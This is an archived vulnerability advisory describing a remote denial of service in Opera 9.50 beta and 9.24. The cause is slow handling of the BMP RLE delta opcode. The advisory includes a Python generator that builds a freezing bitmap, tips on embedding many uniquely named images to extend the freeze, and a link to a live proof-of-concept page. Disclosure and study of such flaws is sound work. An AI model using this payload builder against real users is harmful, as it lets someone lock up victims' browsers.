TUCoPS :: Browsers :: tb13703.htm

Opera 9.50 beta and prior remote DoS (freeze)



* Name   : Opera 9.50 beta / 9.24 Remote DoS
* Type   : Remote DoS
* Credits: Gynvael Coldwind of Vexillium & Simey
* Impact : Low

* Short description

Opera is vulnerable to a remote DoS attack using specially crafted BMP
files that cause the browser to freeze for several minutes (around
4 minutes on a fast computer). An attacker could create a web page that
contains multiple such BMP files displayed by <img> tags. This would
freeze the browser for N*4 minutes, where N is the number of images (so
with 100 images the browser freezes for almost 7 hours). While frozen,
the browser consumes 100% CPU.


* Verbose description

The BMP file format allows Run Length Encoding for 4- and 8-bit
bitmaps. The RLE used in BMP has additional escape opcodes: skipping
the decompression write pointer to the end of the current line (bytes 00
00), skipping to the end of the bitmap (00 01), and moving the write
pointer right by XX columns and down by YY lines (00 02 XX YY, the
"delta" opcode).

Opera has an extremely slow implementation of the 00 02 XX YY opcode.
Normally a decompression algorithm adds XX + YY * width to the write
pointer in a single step, but Opera does this in a much slower way, with
additional checks: the implementation performs XX + YY * width separate
increments (each with its own bounds checks and other calculations).

An attacker can use this to create a BMP file with the maximum possible
width (in Opera this is around 32000 pixels) whose pixel data consists of
nothing but 00 02 FF FF opcodes (see DoS_PoC/DoS_BMP_Generator/test10.cpp
for a sample generator).
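
The following is an added example, not the advisory's own test10.cpp
generator: a Python builder for an 8-bit BI_RLE8 bitmap whose pixel data is
only delta opcodes, plus a reference RLE8 decoder that counts how many
write-pointer updates a delta costs when applied in one step versus one
pixel at a time (the behaviour the advisory attributes to Opera). The
decoder is a spec-based model used to quantify the asymmetry; it is not
Opera's code. The grayscale palette, the 2835 px/m resolution fields and
the helper names are assumptions made for illustration.

```python
import struct

BI_RLE8 = 1  # biCompression value for 8-bit run-length encoded pixel data


def build_rle8_bmp(width, height, rle_data):
    """Wrap arbitrary RLE8 pixel data in a minimal, well-formed BMP container.

    Assumed: 256-entry grayscale palette, 2835 px/m resolution (72 dpi),
    positive height (bottom-up rows, as is conventional for BMP).
    """
    palette = bytes(b for i in range(256) for b in (i, i, i, 0))  # BGRA, 1024 bytes
    info_header = struct.pack(
        "<IiiHHIIiiII",
        40, width, height, 1, 8, BI_RLE8, len(rle_data), 2835, 2835, 256, 256,
    )
    pixel_offset = 14 + 40 + len(palette)  # BITMAPFILEHEADER + BITMAPINFOHEADER + palette
    file_header = struct.pack("<2sIHHI", b"BM", pixel_offset + len(rle_data), 0, 0, pixel_offset)
    return file_header + info_header + palette + rle_data


def delta_payload(n_deltas, dx=0xFF, dy=0xFF):
    """Pixel data made of n_deltas copies of the delta opcode 00 02 dx dy,
    terminated by 00 01 (end of bitmap)."""
    return bytes((0x00, 0x02, dx, dy)) * n_deltas + b"\x00\x01"


def decode_rle8(rle_data, width, height):
    """Reference RLE8 decoder (spec-based model, not Opera's implementation).

    Returns (pixels, direct_steps, naive_steps):
      pixels       - bytearray of width*height palette indexes, rows in file order
      direct_steps - pointer updates if a delta is applied as pos += dx + dy*width
      naive_steps  - pointer updates if a delta is applied one pixel at a time
    Out-of-range writes are dropped rather than corrupting memory.
    """
    pixels = bytearray(width * height)
    x = y = i = 0
    direct_steps = naive_steps = 0
    n = len(rle_data)
    while i + 1 < n:
        count, value = rle_data[i], rle_data[i + 1]
        i += 2
        if count > 0:                      # encoded run: `value` repeated `count` times
            for _ in range(count):
                if x < width and y < height:
                    pixels[y * width + x] = value
                x += 1
            continue
        if value == 0:                     # 00 00: end of line
            x, y = 0, y + 1
        elif value == 1:                   # 00 01: end of bitmap
            break
        elif value == 2:                   # 00 02 dx dy: delta (move right dx, down dy)
            if i + 2 > n:
                raise ValueError("truncated delta opcode")
            dx, dy = rle_data[i], rle_data[i + 1]
            i += 2
            x, y = x + dx, y + dy
            direct_steps += 1              # one pointer addition
            naive_steps += dx + dy * width  # one increment per skipped pixel
        else:                              # absolute mode: `value` literal pixels, word-aligned
            literal = rle_data[i:i + value]
            if len(literal) < value:
                raise ValueError("truncated absolute run")
            for p in literal:
                if x < width and y < height:
                    pixels[y * width + x] = p
                x += 1
            i += value + (value & 1)
    return pixels, direct_steps, naive_steps


def payload_cost(width, n_deltas, dx=0xFF, dy=0xFF):
    """Pointer updates needed to decode delta_payload() at the given width."""
    _, direct_steps, naive_steps = decode_rle8(delta_payload(n_deltas, dx, dy), width, 1)
    return direct_steps, naive_steps


if __name__ == "__main__":
    width, n = 32000, 100
    direct, naive = payload_cost(width, n)
    print(f"{n} deltas at width {width}: {direct} direct updates vs {naive} per-pixel updates")
    bmp = build_rle8_bmp(width, 1, delta_payload(n))
    print(f"bitmap size: {len(bmp)} bytes")
```

At the advisory's width of about 32000 pixels each 00 02 FF FF opcode costs a
single addition in a direct decoder but 255 + 255 * 32000 increments in a
per-pixel one, so even a few hundred 4-byte opcodes translate into billions of
loop iterations, which is the CPU-bound freeze the benchmarks below measure.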

One malformed bitmap freezes the browser for some time; the time
depends on CPU speed. Simple benchmark tests were performed:

CPU TYPE/SPEED                    TIME
Intel Core 2 Quad 2.4 GHz         over 4 minutes
Intel Celeron M 1.6 GHz           over 20 minutes

During this time the browser is frozen, does not react to user
commands, and does not redraw its content.

Additionally, the attacker could create a web page that contains
multiple images (<img> tags) to freeze the browser for N*OneFreezeTime
(where N is the number of images). See DoS_PoC/RunMe.html for a simple
example (10 bitmaps used). Please note that due to Opera's bitmap
caching, each bitmap should be served under a different name (for
example test1.bmp, test2.bmp, and so on).


* Proof of Concept

(This DoSes Opera; no warning is provided ;>)
http://gynvael.vexillium.org/opera_dos/


* Disclaimer

This document and all the information it contains is provided "as is",
without any warranty. The author is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.
